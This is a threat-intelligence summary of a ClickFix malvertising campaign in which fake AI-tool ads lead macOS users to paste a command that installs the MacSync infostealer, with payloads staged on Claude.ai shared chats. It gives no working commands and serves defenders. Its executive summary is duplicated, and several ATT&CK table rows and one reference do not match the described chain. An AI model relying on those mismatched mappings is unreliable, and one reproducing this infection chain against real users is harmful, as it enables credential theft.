EXECUTIVE SUMMARY
Threat actors behind the campaign are loosely organized cybercriminal groups that have adopted the ClickFix malvertising model. They distribute paid search ads that mimic popular AI development tools and macOS utility products, directing users to malicious download pages hosted on free static‐site services before moving the payload onto the Claude.ai shared‐chat feature. The operation targets software developers, IT professionals, and macOS users, with a heavy concentration in the Asia‐Pacific region—particularly Taiwan, Singapore and Japan. Their primary objective is credential theft, harvesting browser cookies, SSH keys and cryptocurrency wallet files for resale.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
Threat actors behind the campaign are loosely organized cybercriminal groups that have adopted the ClickFix malvertising model. They distribute paid search ads that mimic popular AI development tools and macOS utility products, directing users to malicious download pages hosted on free static‐site services before moving the payload onto the Claude.ai shared‐chat feature. The operation targets software developers, IT professionals, and macOS users, with a heavy concentration in the Asia‐Pacific region—particularly Taiwan, Singapore and Japan. Their primary objective is credential theft, harvesting browser cookies, SSH keys and cryptocurrency wallet files for resale.[emaillocker id="1283"]
The infection chain begins when a user clicks a sponsored ad that appears alongside legitimate AI‐tool search results. The link leads to a page on a reputable domain that hosts a copy‐and‐paste command, often presented as a fix or installation step. When the command runs, a short script downloads an encoded payload from a remote host, decodes it and executes the MacSync infostealer. The malware then gathers credentials, key material and wallet files before transmitting them to a command‐and‐control server.
Persistence is achieved through a launch‐agent, and the attacker can issue further commands via the same shared‐chat conduit. The campaign matters because it exploits trusted domains and a native collaboration feature, making traditional URL‐based blocks ineffective and leaving organizations exposed to credential loss. Detection is hampered by the lack of suspicious infrastructure; instead, the malicious content resides on a legitimate AI platform that passes most web‐gateway checks. Defences should include strict web‐filter policies that scrutinize sponsored ads, monitoring for unexpected terminal commands and enforcing least‐privilege on macOS workstations. Regular backups, endpoint detection with behavioral analytics, and continuous security awareness training for developers are essential to reduce the risk of successful compromise.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Defense Evasion | T1027.006 | Obfuscated Files or Information | HTML Smuggling |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Discovery | T1082 | System Information Discovery | — |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The reports contain further technical details:
https://www.trendmicro.com/en_us/research/26/f/claudeai-shared-chat-abused-in-malvertising.html
https://cybersecuritynews.com/hackers-abuse-microsoft-fondue-exe/